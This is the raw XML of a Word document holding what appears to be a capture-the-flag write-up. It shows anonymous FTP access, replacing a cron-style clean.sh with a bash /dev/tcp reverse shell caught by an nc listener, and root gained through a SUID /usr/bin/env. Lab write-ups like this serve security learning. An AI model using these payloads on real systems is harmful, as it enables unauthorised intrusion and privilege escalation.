            <wp:extent cx="5645150" cy="15741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9380" w14:textId="7286FBE5" w:rsidR="00DE5E2D" w:rsidRDefault="00D00665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I downloaded them with the same command as before </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00665">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“get [file name]”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F3454" w14:textId="77777777" w:rsidR="00464649" w:rsidRDefault="00464649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I open t</w:t>
      </w:r>
      <w:r w:rsidR="00CC1C83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">he to_do.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">with the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00464649">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“cat [file name]”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidR="00CC1C83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>says “</w:t>
      </w:r>
      <w:r w:rsidR="00CC1C83" w:rsidRPr="00CC1C83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I really need to disable the anonymous login...it's really not safe</w:t>
      </w:r>
      <w:r w:rsidR="00CC1C83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, hmm not much info here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ext</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> I want to see the clean.sh file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCB9D76" w14:textId="71955ACA" w:rsidR="00464649" w:rsidRDefault="00244B3D" w:rsidP="00544F1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5BDEB4" wp14:editId="267B4C09">
            <wp:extent cx="5748793" cy="1820409"/>
            <wp:effectExtent l="0" t="0" r="444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16" cy="18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657F" w14:textId="13ADCBB9" w:rsidR="00CC1C83" w:rsidRDefault="00464649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eresting, </w:t>
      </w:r>
      <w:r w:rsidR="00AF2762">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">essentially this script it is written in bash and it systematically cleans the </w:t>
      </w:r>
      <w:r w:rsidR="001B206E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF2762">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF2762">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder. N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ow what if I changed the content of the file and put a payload to get a reverse shell then upload it to the ftp server and just wait for connection.</w:t>
      </w:r>
      <w:r w:rsidR="00F771AB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC1C83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A6425">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">First things </w:t>
      </w:r>
      <w:r w:rsidR="00CF7342">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>first,</w:t>
      </w:r>
      <w:r w:rsidR="0076295F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the best place to go if you want a reverse shell is</w:t>
      </w:r>
      <w:r w:rsidR="00891F41">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00891F41" w:rsidRPr="00891F41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EB07E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the shell I will use for this is </w:t>
      </w:r>
      <w:r w:rsidR="00EB07E0" w:rsidRPr="00EB07E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“bash -I &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB07E0" w:rsidRPr="00EB07E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB07E0" w:rsidRPr="00EB07E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/[your IP]/[Any port] 0&gt;S&amp;1”</w:t>
      </w:r>
      <w:r w:rsidR="00EB07E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, I deleted everything inside the script except the first line and put my shell</w:t>
      </w:r>
      <w:r w:rsidR="007930C9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> like so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDC46E" w14:textId="4CEAD0CA" w:rsidR="007930C9" w:rsidRDefault="00244B3D" w:rsidP="00544F1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D674D8" wp14:editId="420EF764">
            <wp:extent cx="3713480" cy="8032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13B1" w14:textId="02BA3FB8" w:rsidR="007930C9" w:rsidRDefault="007930C9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n </w:t>
      </w:r>
      <w:r w:rsidR="00F54CC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> connected again to the ftp server like before, and replaced the clean.sh with my clean.sh with the command </w:t>
      </w:r>
      <w:r w:rsidRPr="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009B6FA3" w:rsidRPr="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>put [file name]</w:t>
      </w:r>
      <w:r w:rsidRPr="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00201159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F54CC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> After that I opened a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F54CC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F54CC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener to catch the connection. The command is </w:t>
      </w:r>
      <w:r w:rsidR="00F54CC9" w:rsidRPr="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F54CC9" w:rsidRPr="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F54CC9" w:rsidRPr="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F54CC9" w:rsidRPr="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F54CC9" w:rsidRPr="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> [port]”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2B37DB" w14:textId="5D5DD87C" w:rsidR="00F54CC9" w:rsidRDefault="00F54CC9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 = listen for IP only, not DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE4613F" w14:textId="13180211" w:rsidR="00F54CC9" w:rsidRDefault="00F54CC9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 = verbose mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B13FDC6" w14:textId="716C5B51" w:rsidR="00F54CC9" w:rsidRDefault="00F54CC9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 = listen mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F81747" w14:textId="024696F1" w:rsidR="00F54CC9" w:rsidRDefault="00F54CC9" w:rsidP="00544F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 = defines the port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4918C989" w14:textId="77777777" w:rsidR="00D80751" w:rsidRDefault="00EE40E0" w:rsidP="00EE4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fter a while I am in!!!</w:t>
      </w:r>
      <w:r w:rsidR="0098209E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> I am connected as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0098209E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>namelessone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A49AB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Inside the current folder is the user.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA1F8BD" w14:textId="5D88A0B1" w:rsidR="00D80751" w:rsidRDefault="00244B3D" w:rsidP="00EE40E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964A5" wp14:editId="15AE5F3F">
            <wp:extent cx="5279666" cy="4830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49" cy="4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97F7" w14:textId="3D3EC456" w:rsidR="00244B3D" w:rsidRDefault="00244B3D" w:rsidP="00EE40E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700670" wp14:editId="67E0ED5A">
            <wp:extent cx="2401570" cy="858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4FB3" w14:textId="18E16C1F" w:rsidR="009325CE" w:rsidRDefault="007A49AB" w:rsidP="00EE4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order to have a more interactive shell I must spawn a TTY shell, to do this there are some commands which can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00891F41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000F339E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002944FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> After the TTY shell I run the </w:t>
      </w:r>
      <w:r w:rsidR="002944FB" w:rsidRPr="002944FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002944FB" w:rsidRPr="002944FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002944FB" w:rsidRPr="002944FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l”</w:t>
      </w:r>
      <w:r w:rsidR="00F95B7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002944FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">to see what commands I can run as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002944FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002944FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it asked me for a password, damn!!!</w:t>
      </w:r>
      <w:r w:rsidR="0065216A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The other thing I can try is to check what commands I can run as SUID with the command </w:t>
      </w:r>
      <w:r w:rsidR="0065216A" w:rsidRPr="001F6B46">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“find / -perm -u=s -type f 2&gt;/dev/null”</w:t>
      </w:r>
      <w:r w:rsidR="0065216A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F6B46">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and there is an interesting command here “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F6B46">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F6B46">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/bin/env”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFD945E" w14:textId="2685C26A" w:rsidR="001F6B46" w:rsidRDefault="003A035B" w:rsidP="00EE40E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026AF" wp14:editId="73590108">
            <wp:extent cx="2210435" cy="668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3E0" w14:textId="1C8B8600" w:rsidR="001F6B46" w:rsidRDefault="00FB63D8" w:rsidP="00EE4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order to see how I can </w:t>
      </w:r>
      <w:r w:rsidR="0035291B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit this command I went </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="0035291B" w:rsidRPr="0035291B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0035291B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and found this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA06260" w14:textId="062BE882" w:rsidR="0035291B" w:rsidRDefault="003A035B" w:rsidP="00EE40E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8BBC0C" wp14:editId="73726224">
            <wp:extent cx="5725160" cy="18923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A02D" w14:textId="5D836637" w:rsidR="0035291B" w:rsidRDefault="00384770" w:rsidP="00EE4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I ran the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00D533E4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>“/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D533E4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D533E4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/bin/env /bin/bash -p”</w:t>
      </w:r>
      <w:r w:rsidR="00D533E4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got root. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D533E4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Yayyy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D533E4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F54584" w14:textId="1D684835" w:rsidR="003A035B" w:rsidRDefault="003A035B" w:rsidP="00773F15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38A3B" wp14:editId="49A271FA">
            <wp:extent cx="4134485" cy="8743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C922" w14:textId="4D7EF9D0" w:rsidR="00E1712D" w:rsidRDefault="00E1712D" w:rsidP="00EE40E0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B427FF3" w14:textId="77777777" w:rsidR="00E1712D" w:rsidRDefault="00E1712D" w:rsidP="00EE40E0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090195D4" w14:textId="74CFDEAB" w:rsidR="001F7238" w:rsidRPr="00123080" w:rsidRDefault="001F7238" w:rsidP="000D33B7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00123080">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Thank you for choosing my writeup!!!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001F7238" w:rsidRPr="00123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1173E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5A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E4B75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CF80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52B16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58AE6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ED"/>
    <w:rsid w:val="00054A53"/>
    <w:rsid w:val="00066EB1"/>
    <w:rsid w:val="00096D38"/>
    <w:rsid w:val="000B2D66"/>
    <w:rsid w:val="000D33B7"/>
    <w:rsid w:val="000F29D9"/>
    <w:rsid w:val="000F339E"/>
    <w:rsid w:val="00123080"/>
    <w:rsid w:val="001526EC"/>
    <w:rsid w:val="0017367E"/>
    <w:rsid w:val="00181A51"/>
    <w:rsid w:val="00183F9F"/>
    <w:rsid w:val="00192068"/>
    <w:rsid w:val="001B206E"/>
    <w:rsid w:val="001E62B7"/>
    <w:rsid w:val="001F6B46"/>
    <w:rsid w:val="001F7238"/>
    <w:rsid w:val="00200F9C"/>
    <w:rsid w:val="00201159"/>
    <w:rsid w:val="00221519"/>
    <w:rsid w:val="00244B3D"/>
    <w:rsid w:val="00247636"/>
    <w:rsid w:val="002844DD"/>
    <w:rsid w:val="002944FB"/>
    <w:rsid w:val="002B0044"/>
    <w:rsid w:val="002B0F85"/>
    <w:rsid w:val="002E3A69"/>
    <w:rsid w:val="00305BCE"/>
    <w:rsid w:val="00332DA6"/>
    <w:rsid w:val="0035291B"/>
    <w:rsid w:val="003613A1"/>
    <w:rsid w:val="00384770"/>
    <w:rsid w:val="00392EF6"/>
    <w:rsid w:val="003A035B"/>
    <w:rsid w:val="003A6425"/>
    <w:rsid w:val="003D7FD7"/>
    <w:rsid w:val="003E6C54"/>
    <w:rsid w:val="004379AC"/>
    <w:rsid w:val="004537EB"/>
    <w:rsid w:val="00464649"/>
    <w:rsid w:val="004B51A1"/>
    <w:rsid w:val="004C4A7D"/>
    <w:rsid w:val="004D18EF"/>
    <w:rsid w:val="005008C0"/>
    <w:rsid w:val="00544F13"/>
    <w:rsid w:val="00553210"/>
    <w:rsid w:val="00584660"/>
    <w:rsid w:val="005A6857"/>
    <w:rsid w:val="005F0477"/>
    <w:rsid w:val="0065216A"/>
    <w:rsid w:val="007118D8"/>
    <w:rsid w:val="0076295F"/>
    <w:rsid w:val="007708DF"/>
    <w:rsid w:val="00773F15"/>
    <w:rsid w:val="007930C9"/>
    <w:rsid w:val="007A49AB"/>
    <w:rsid w:val="007D38D6"/>
    <w:rsid w:val="007F0C56"/>
    <w:rsid w:val="00815E33"/>
    <w:rsid w:val="00891F41"/>
    <w:rsid w:val="008C04DC"/>
    <w:rsid w:val="008F662C"/>
    <w:rsid w:val="009325CE"/>
    <w:rsid w:val="009729FA"/>
    <w:rsid w:val="00977AC1"/>
    <w:rsid w:val="0098209E"/>
    <w:rsid w:val="0099229A"/>
    <w:rsid w:val="009B6FA3"/>
    <w:rsid w:val="00A47B67"/>
    <w:rsid w:val="00A9443A"/>
    <w:rsid w:val="00A95937"/>
    <w:rsid w:val="00AA083E"/>
    <w:rsid w:val="00AA36AA"/>
    <w:rsid w:val="00AA5C08"/>
    <w:rsid w:val="00AC5EAE"/>
    <w:rsid w:val="00AC7F19"/>
    <w:rsid w:val="00AD3F91"/>
    <w:rsid w:val="00AF24ED"/>
    <w:rsid w:val="00AF2762"/>
    <w:rsid w:val="00B22F7B"/>
    <w:rsid w:val="00B45B70"/>
    <w:rsid w:val="00B55225"/>
    <w:rsid w:val="00BA1D28"/>
    <w:rsid w:val="00C04224"/>
    <w:rsid w:val="00C206F2"/>
    <w:rsid w:val="00C4025F"/>
    <w:rsid w:val="00C609EE"/>
    <w:rsid w:val="00C725AC"/>
    <w:rsid w:val="00C74F5C"/>
    <w:rsid w:val="00C97B24"/>
    <w:rsid w:val="00CC1C83"/>
    <w:rsid w:val="00CF7342"/>
    <w:rsid w:val="00D00665"/>
    <w:rsid w:val="00D31C5A"/>
    <w:rsid w:val="00D533E4"/>
    <w:rsid w:val="00D6354D"/>
    <w:rsid w:val="00D80751"/>
    <w:rsid w:val="00D867B6"/>
    <w:rsid w:val="00DE595F"/>
    <w:rsid w:val="00DE5E2D"/>
    <w:rsid w:val="00DF0FE8"/>
    <w:rsid w:val="00E1712D"/>
    <w:rsid w:val="00E27731"/>
    <w:rsid w:val="00E7063A"/>
    <w:rsid w:val="00EB07E0"/>
    <w:rsid w:val="00EB52AA"/>
    <w:rsid w:val="00EE40E0"/>
    <w:rsid w:val="00F54773"/>
    <w:rsid w:val="00F54CC9"/>
    <w:rsid w:val="00F61D45"/>
    <w:rsid w:val="00F771AB"/>
    <w:rsid w:val="00F95B7E"/>
    <w:rsid w:val="00FA3013"/>
    <w:rsid w:val="00FA5CDA"/>
    <w:rsid w:val="00FB63D8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EB34"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6E1634AB-503B-4165-9E94-432BBEEE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pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-shee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hyperlink" Target="https://netsec.ws/?p=3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\\[IP]\\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\\\\[IP]\\pics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gtfobins.github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8270-8259-4C4D-A66A-0FB84A4C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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>random</cp:lastModifiedBy>
  <cp:revision>114</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-10T14:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-10T17:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>